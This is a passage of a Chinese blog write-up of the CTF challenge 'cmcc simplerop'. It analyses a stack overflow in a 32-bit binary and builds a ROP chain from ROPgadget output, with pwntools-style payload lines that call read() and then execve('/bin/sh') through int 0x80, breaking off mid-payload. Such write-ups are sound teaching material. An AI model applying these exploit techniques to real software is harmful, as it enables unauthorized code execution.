cmcc Simplerop

题目来源

1. 安全策略

[*] '/root/ctf/buuctf/pwn/simplerop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

2. 分析

程序的功能很简单,接收一段用户的输入,向大小为32的栈中最多可以写入100个字节的数据。是很明显的rop的题目。

ret2libc

首先可以考虑ret2libc的方式。但是这题没有got和plt表,这里我没有找到方法去泄露libc地址,因此放弃了这种方式

方法一 execve

然后考虑execve("/bin/sh",0,0)的方式获取shell。

  • 利用ropgadget寻找gadget
    root@kali:~/ctf/buuctf/pwn# ROPgadget --binary simplerop --only "int"
    Gadgets information
    ============================================================
    0x080493e1 : int 0x80
    
    Unique gadgets found: 1
    
    root@kali:~/ctf/buuctf/pwn# ROPgadget --binary simplerop --only "pop|ret" | grep eax
    0x0809da8a : pop eax ; pop ebx ; pop esi ; pop edi ; ret
    0x080bae06 : pop eax ; ret
    0x08071e3a : pop eax ; ret 0x80e
    0x0809da89 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
    
    因此的话可以构造出来payload来出发0xb系统调用
    exevce = p32(pop_eax_ret) + p32(0xb) + p32(int_80)
    payload = p32(pop_edx_ecx_eax_ret) + p32(0) + p32(0) + p32(binsh) + execve
    
  • 继续分析发现程序中找不到binsh字符串,因此考虑利用read函数将/bin/sh写入到bss段中。
    # read(0, binsh, 0x8)
    read = 0x0806cd50
    binsh = 0x080eaf80
    payload = p32(read) + p32(retn) + p32(0) + p32(binsh) + p32(0x8)
    
  • 合并上面两个payload
    payload = cyclic(32)
    payload += p32(read) + p32(retn) + p32(0) + p32(binsh) + p32(0x8)
    payload += p32(pop_edx_ecx_eax_ret) + p32
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值